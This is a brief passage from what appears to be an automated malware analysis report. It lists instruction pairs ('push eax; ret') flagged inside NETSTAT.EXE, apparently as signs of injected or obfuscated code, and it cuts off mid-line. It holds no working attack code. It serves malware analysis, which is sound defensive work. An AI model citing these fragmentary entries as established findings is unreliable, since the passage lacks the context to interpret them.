          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_034CDE2D push ecx; ret 5_2_034CDE40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032B9A35 push eax; ret 5_2_032B9A88
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032B9A8B push eax; ret 5_2_032B9AF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032B9A82 push eax; ret 5_2_032B9A88
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032B9AEC push eax; ret 5_2_032B9AF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032BAEEA push eax; ret 5_2_032BAEF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_032BA486 pushad ; ret 5_2_032BA487
          Source: initial sample | Static PE infor